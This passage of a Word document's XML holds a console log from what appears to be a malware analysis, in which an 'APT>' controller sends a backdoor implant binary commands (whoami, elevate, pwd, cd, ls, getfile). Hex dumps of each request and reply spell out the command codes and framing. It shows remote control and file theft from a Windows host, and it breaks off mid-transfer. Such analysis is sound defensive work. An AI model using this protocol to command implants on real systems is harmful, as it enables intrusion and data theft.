    <w:p w14:paraId="100811D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 FF FF FF FF              ............                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A02990" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 4294967295                                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B673A5A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;whoami                                                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02365BA7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x16\x00\x00\x00' (8 bytes)                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A66B7AF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 16 00 00 00                          ........                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A1A03F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D8267" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1E 00 00 00 17 00 00 00 00 00 00 00 06 00 00 00  ................                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD08A61" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 06 00 00 00 00 00 00 00 61 64 6D 69 6E 00        ........admin.                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E59605D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: admin      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D2A14E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C831F28" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4EF1A3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;elevate                                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7898C537" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x19\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x000' (25 bytes)                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D2C85E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 19 00 00 00 20 00 00 00 00 00 00 00 01 00 00 00  .... ...........                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D7B85" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 01 00 00 00 00 00 00 00 30                       ........0                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795847B9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC47D11" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 21 00 00 00 00 00 00 00 04 00 00 00  ....!...........                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFECE90" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 FF FF FF FF              ............                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40475EE7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 4294967295                                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D108FAD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;whoami                                                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F648576" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x16\x00\x00\x00' (8 bytes)                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E60E0BF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 16 00 00 00                          ........                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459AFA45" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657FFEB5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1E 00 00 00 17 00 00 00 00 00 00 00 06 00 00 00  ................                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5B5731" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 06 00 00 00 00 00 00 00 61 64 6D 69 6E 00        ........admin.                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2CF328" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: admin       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6078FEDA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD5C950" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5098CCEA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;pwd                                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FA1875" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x14\x00\x00\x00' (8 bytes)                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6589061C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 14 00 00 00                          ........                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BC568F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5851857D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 2C 00 00 00 15 00 00 00 00 00 00 00 14 00 00 00  ,...............                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7AE892" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 14 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 44 4F  ........C:\WINDO                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683912E9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 57 53 5C 73 79 73 74 65 6D 33 32 00              WS\system32.                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709767BB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: C:\WINDOWS\system32       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B737122" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C81D77" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;cd ..                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161F184E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x1b\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00..\x00' (27 bytes)         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F4130C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1B 00 00 00 12 00 00 00 00 00 00 00 03 00 00 00  ................                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8B7B5D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 03 00 00 00 00 00 00 00 2E 2E 00                 ...........                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41088DFB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003B9EF1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 13 00 00 00 00 00 00 00 04 00 00 00  ................                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4D4557" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5169E084" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 0                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D6FBDD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;cd ..                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038928A0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x1b\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00..\x00' (27 bytes)         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE845B6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1B 00 00 00 12 00 00 00 00 00 00 00 03 00 00 00  ................                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC72AD0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 03 00 00 00 00 00 00 00 2E 2E 00                 ...........                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC24349" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9BF334" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 13 00 00 00 00 00 00 00 04 00 00 00  ................                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCDE7C2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6540DD75" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 0                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047CC57F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;cd Users                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B15382" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x1e\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00Users\x00' (30 bytes)      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD68CF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1E 00 00 00 12 00 00 00 00 00 00 00 06 00 00 00  ................                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0AAB16" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 06 00 00 00 00 00 00 00 55 73 65 72 73 00        ........Users.                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53523552" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D46BD3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 13 00 00 00 00 00 00 00 04 00 00 00  ................                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573939BE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496921CA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 0                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61420E35" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;cd admin                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E280090" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x1e\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00admin\x00' (30 bytes)      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA7113" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1E 00 00 00 12 00 00 00 00 00 00 00 06 00 00 00  ................                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C0BACB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 06 00 00 00 00 00 00 00 61 64 6D 69 6E 00        ........admin.                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CAF63B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39551245" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 13 00 00 00 00 00 00 00 04 00 00 00  ................                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAABCEF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241EC477" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 0  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B63C014" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CCC979B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13:24 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE0F511" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;ls                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54266C42" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x18\x00\x00\x00' (8 bytes)                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61140D12" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 18 00 00 00                          ........                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5946575C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received: 'w\x05\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00_\x05\x00\x00_\x05\x00\x00\x00\x00\x00\x00.\n..\n.ssh\n20190503_perfmon_win10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A924CDE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\n20190503_perfmon_win10.zip\n20190503_regmon_win10\n20190503_regmon_win10.'...'txt\n' (1399 bytes)                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599BE8CB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: .        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3E8F3C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7409C251" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35708F3E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;getfile hosts hosts                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A341411" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x1e\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00hosts\x00' (30 bytes)      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF2A225" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1E 00 00 00 04 00 00 00 00 00 00 00 06 00 00 00  ................                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49435AB4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 06 00 00 00 00 00 00 00 68 6F 73 74 73 00        ........hosts.                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FB8F92" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received: 'k\x06\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00S\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00# $FreeBSD$\n#\n# Host Database\</w:t>
      </w:r>
    </w:p>
